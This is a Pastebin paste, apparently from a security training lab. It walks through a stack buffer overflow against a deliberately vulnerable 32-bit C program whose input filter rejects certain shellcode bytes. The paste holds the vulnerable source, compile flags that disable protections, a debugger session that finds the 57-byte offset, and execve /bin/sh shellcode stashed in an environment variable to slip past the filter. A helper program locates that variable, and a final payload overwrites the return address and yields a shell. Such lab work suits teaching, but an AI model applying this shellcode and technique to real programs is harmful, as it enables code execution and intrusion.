Combreal

BOF_using_environment_variable

Aug 10th, 2020
1,614
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /////BOF environment variable
  2.  
  3.  
  4. bin02.c
  5. #include <stdio.h>
  6. #include <string.h>
  7.  
  8. int protect_affiche(char *texte)
  9. {
  10.         char buffer[45];
  11.         strcpy(buffer, texte);
  12.         printf("%s\n",buffer);
  13. }
  14.  
  15. int main(int argc, char ** argv)
  16. {
  17.         char interdit[]={0x89,0x90,0x99,0x80,0xc0,0xe1,0xb0,0x00};
  18.         int i,j;
  19.         if (argc!=2)
  20.         {
  21.                 printf("Usage: %s <texte>\n", argv[0]);
  22.                 return 1;
  23.         }
  24.         for(i=0;argv[1][i];i++)
  25.         {
  26.                 for(j=0;interdit[j];j++)
  27.                 {
  28.                         if(argv[1][i] == interdit[j])
  29.                         {
  30.                                 printf("Detection shellcode !\n");
  31.                                 return 1;
  32.                         }
  33.                 }
  34.         }
  35.         protect_affiche(argv[1]);
  36.         return 0;
  37. }
  38.  
  39. gcc -m32 -fno-stack-protector -z execstack in02.c -o bin02
  40.  
  41. peda bin02
  42. disass main
  43. 0x08048459 <+0>:     push   ebp
  44.    0x0804845a <+1>:     mov    ebp,esp
  45.    0x0804845c <+3>:     and    esp,0xfffffff0
  46.    0x0804845f <+6>:     sub    esp,0x20
  47.    0x08048462 <+9>:     mov    BYTE PTR [esp+0x10],0x89
  48.    0x08048467 <+14>:    mov    BYTE PTR [esp+0x11],0x90
  49.    0x0804846c <+19>:    mov    BYTE PTR [esp+0x12],0x99
  50.    0x08048471 <+24>:    mov    BYTE PTR [esp+0x13],0x80
  51.    0x08048476 <+29>:    mov    BYTE PTR [esp+0x14],0xc0
  52.    0x0804847b <+34>:    mov    BYTE PTR [esp+0x15],0xe1
  53.    0x08048480 <+39>:    mov    BYTE PTR [esp+0x16],0xb0
  54.    0x08048485 <+44>:    mov    BYTE PTR [esp+0x17],0x0
  55.    0x0804848a <+49>:    cmp    DWORD PTR [ebp+0x8],0x2
  56.    0x0804848e <+53>:    je     0x80484b0 <main+87>
  57.    0x08048490 <+55>:    mov    eax,DWORD PTR [ebp+0xc]
  58.    0x08048493 <+58>:    mov    edx,DWORD PTR [eax]
  59.    0x08048495 <+60>:    mov    eax,0x8048600
  60.    0x0804849a <+65>:    mov    DWORD PTR [esp+0x4],edx
  61.    0x0804849e <+69>:    mov    DWORD PTR [esp],eax
  62.    0x080484a1 <+72>:    call   0x8048354 <printf@plt>
  63.    0x080484a6 <+77>:    mov    eax,0x1
  64.    0x080484ab <+82>:    jmp    0x8048538 <main+223>
  65.    0x080484b0 <+87>:    mov    DWORD PTR [esp+0x18],0x0
  66.    0x080484b8 <+95>:    jmp    0x804850d <main+180>
  67.    0x080484ba <+97>:    mov    DWORD PTR [esp+0x1c],0x0
  68.    0x080484c2 <+105>:   jmp    0x80484fb <main+162>
  69.    0x080484c4 <+107>:   mov    eax,DWORD PTR [ebp+0xc]
  70.    0x080484c7 <+110>:   add    eax,0x4
  71.    0x080484ca <+113>:   mov    edx,DWORD PTR [eax]
  72.    0x080484cc <+115>:   mov    eax,DWORD PTR [esp+0x18]
  73.    0x080484d0 <+119>:   lea    eax,[edx+eax*1]
  74.    0x080484d3 <+122>:   movzx  edx,BYTE PTR [eax]
  75.    0x080484d6 <+125>:   mov    eax,DWORD PTR [esp+0x1c]
  76.    0x080484da <+129>:   movzx  eax,BYTE PTR [esp+eax*1+0x10]
  77.    0x080484df <+134>:   cmp    dl,al
  78.    0x080484e1 <+136>:   jne    0x80484f6 <main+157>
  79.    0x080484e3 <+138>:   mov    DWORD PTR [esp],0x8048613
  80.    0x080484ea <+145>:   call   0x8048364 <puts@plt>
  81.    0x080484ef <+150>:   mov    eax,0x1
  82.    0x080484f4 <+155>:   jmp    0x8048538 <main+223>
  83.    0x080484f6 <+157>:   add    DWORD PTR [esp+0x1c],0x1
  84.    0x080484fb <+162>:   mov    eax,DWORD PTR [esp+0x1c]
  85.    0x080484ff <+166>:   movzx  eax,BYTE PTR [esp+eax*1+0x10]
  86.    0x08048504 <+171>:   test   al,al
  87.    0x08048506 <+173>:   jne    0x80484c4 <main+107>
  88.    0x08048508 <+175>:   add    DWORD PTR [esp+0x18],0x1
  89.    0x0804850d <+180>:   mov    eax,DWORD PTR [ebp+0xc]
  90.    0x08048510 <+183>:   add    eax,0x4
  91.    0x08048513 <+186>:   mov    edx,DWORD PTR [eax]
  92.    0x08048515 <+188>:   mov    eax,DWORD PTR [esp+0x18]
  93.    0x08048519 <+192>:   lea    eax,[edx+eax*1]
  94.    0x0804851c <+195>:   movzx  eax,BYTE PTR [eax]
  95.    0x0804851f <+198>:   test   al,al
  96.    0x08048521 <+200>:   jne    0x80484ba <main+97>
  97.    0x08048523 <+202>:   mov    eax,DWORD PTR [ebp+0xc]
  98.    0x08048526 <+205>:   add    eax,0x4
  99.    0x08048529 <+208>:   mov    eax,DWORD PTR [eax]
  100.    0x0804852b <+210>:   mov    DWORD PTR [esp],eax
  101.    0x0804852e <+213>:   call   0x8048434 <protect_affiche>
  102.    0x08048533 <+218>:   mov    eax,0x0
  103.    0x08048538 <+223>:   leave
  104.    0x08048539 <+224>:   ret
  105. disass protect_affiche
  106. 0x08048434 <+0>:     push   ebp
  107.    0x08048435 <+1>:     mov    ebp,esp
  108.    0x08048437 <+3>:     sub    esp,0x48
  109.    0x0804843a <+6>:     mov    eax,DWORD PTR [ebp+0x8]
  110.    0x0804843d <+9>:     mov    DWORD PTR [esp+0x4],eax
  111.    0x08048441 <+13>:    lea    eax,[ebp-0x35]
  112.    0x08048444 <+16>:    mov    DWORD PTR [esp],eax
  113.    0x08048447 <+19>:    call   0x8048344 <strcpy@plt>
  114.    0x0804844c <+24>:    lea    eax,[ebp-0x35]
  115.    0x0804844f <+27>:    mov    DWORD PTR [esp],eax
  116.    0x08048452 <+30>:    call   0x8048364 <puts@plt>
  117.    0x08048457 <+35>:    leave
  118.    0x08048458 <+36>:    ret
  119. b *0x08048434
  120. b *0x08048447
  121. r toto
  122. x/wx $esp
  123.    0xbffffbfc:     0x08048533
  124. c
  125. dumpargs
  126.    Guessed arguments:
  127.    arg[0]: 0xbffffbc3 --> 0xfffbf6b7
  128.    arg[1]: 0xbffffe0d ("toto")
  129. p/d 0xbffffbfc-0xbffffbc3
  130.    $1 = 57
  131. q
  132.  
  133.  
  134. export SHELLCODE=$(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
  135.  
  136.  
  137. nano getenvvar.c
  138. #include <stdio.h>
  139. #include <stdlib.h>
  140. #include <string.h>
  141.  
  142. int main(int argc, char *argv[]) {
  143.     char *ptr;
  144.  
  145.     if(argc < 3) {
  146.         printf("Usage: %s <environment variable> <target name program>\n", argv[0]);
  147.         exit(EXIT_FAILURE);
  148.     }
  149.  
  150.     ptr = getenv(argv[1]); /* get env var location */
  151.     ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
  152.  
  153.     printf("%s will be at %p\n", argv[1], ptr);
  154.  
  155.     return EXIT_SUCCESS;
  156. }
  157.  
  158. gcc -m32 getenvvar.c -o getenvvar
  159.  
  160. ./getenvvar SHELLCODE bin02
  161.    SHELLCODE will be at 0xbffffe1f
  162.  
  163. ./bin02 $(python -c 'print "A"*57 + "\x1f\xfe\xff\xbf"')
  164. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#▒▒▒
  165. $
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×